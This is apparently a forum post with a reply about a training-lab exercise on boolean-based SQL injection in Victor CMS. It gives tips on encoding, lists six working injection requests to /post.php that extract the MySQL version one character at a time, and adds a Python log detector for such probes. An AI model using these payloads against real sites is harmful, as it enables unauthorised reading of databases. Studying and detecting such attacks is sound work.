Tips Victor CMS - Exploiting Boolean-based SQL Injection Vulnerabilities

During the walkthrough by Alexis in the video it looked like things were not going as expected. I spent some time trying this out myself in the Victor CMS lab and want to share my experiences. It might be helpful for others. My observations are as follows:

  • The MySQL version detected by SQLmap (5.0.12 in my case) is not correct. Using the exploit "Victor CMS 1.0 - 'Search' SQL Injection - PHP webapps Exploit" I was able to detect it as 5.5.56-log. This can cause confusion if you expect substring(version(), x, y) to come up with the same results as detected by SQLmap.
  • The correct use of substring(string, x, y) is to provide the position in the string with x and use y for the length of the string that you want to compare. In our case we match on one character, so y should always be 1.
  • In my case it did not work when the '='-sign was URL-encoded. Not sure why, but I noticed that the '='-sign was not URL-encoded when sending the request via the application. So in Burp, after URL-encoding the string, I changed the '%3d' back to '=' and it worked reliably after that.

Calls with positive boolean result that determined the MySQL version (5.5.56 in my case):
Character 1: GET /post.php?post=1+AND+substring(version(),1,1)='5'%23 HTTP/2
Character 2: GET /post.php?post=1+AND+substring(version(),2,1)='.'%23 HTTP/2
Character 3: GET /post.php?post=1+AND+substring(version(),3,1)='5'%23 HTTP/2
Character 4: GET /post.php?post=1+AND+substring(version(),4,1)='.'%23 HTTP/2
Character 5: GET /post.php?post=1+AND+substring(version(),5,1)='5'%23 HTTP/2
Character 6: GET /post.php?post=1+AND+substring(version(),6,1)='6'%23 HTTP/2

In all these cases I got post 1 correctly loaded. With other values it did not load the post properly.

Hope this helps.
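From the defender's side, the request pattern above (one probe per character position, '#' sent as %23, and '=' sometimes sent as %3d) is easy to spot in web server logs once the query string is URL-decoded. The following is an added example, not code from the original post or from Victor CMS: a small detector that parses constructed sample access-log lines, decodes the query parameters and flags boolean-based substring() probes, counting them per client address.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample access-log lines (not from the original post): three
# boolean-based probes like the ones above (one sends '=' as %3d) and one
# ordinary request for the same post.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /post.php?post=1+AND+substring(version(),1,1)='5'%23 HTTP/2" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /post.php?post=1+AND+substring(version(),2,1)%3d'.'%23 HTTP/2" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /post.php?post=1+AND+substring(version(),1,1)='4'%23 HTTP/2" 200 1320
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /post.php?post=1 HTTP/2" 200 5120
"""

# Common log format: client, request line, status, response size.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) '
                    r'(?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+)')

# Probe shape used on this page: AND substring(<expr>,<pos>,1)='<c>' then a '#'
# comment. Applied after URL decoding, so %3d and %23 variants match as well.
PROBE_RE = re.compile(r"\bAND\s+substring\s*\(\s*([^,]+?)\s*,\s*(\d+)\s*,\s*1\s*\)"
                      r"\s*=\s*'(.?)'\s*#", re.IGNORECASE)

def decoded_params(target):
    """Yield (name, value) pairs of the query string, fully URL-decoded."""
    for pair in urlsplit(target).query.split("&"):
        name, _, value = pair.partition("=")
        yield unquote_plus(name), unquote_plus(value)

def find_probes(log_text):
    """Return (ip, param, expr, position, char, size) for each probe request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, value in decoded_params(m.group("target")):
            p = PROBE_RE.search(value)
            if p:
                hits.append((m.group("ip"), name, p.group(1), int(p.group(2)),
                             p.group(3), int(m.group("size"))))
    return hits

def probes_per_ip(hits):
    """Count probes per client; a long run from one address is the alert signal."""
    counts = {}
    for h in hits:
        counts[h[0]] = counts.get(h[0], 0) + 1
    return counts
```

Running find_probes(SAMPLE_LOG) returns the three probe tuples, and probes_per_ip shows they all come from 10.0.0.5; the differing response size on the third line is the same true/false signal the post describes, seen from the server side.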

Yeah, that’s true… even when you exploit with sqlmap and show the banner you get the correct version:
banner: '5.5.56-log'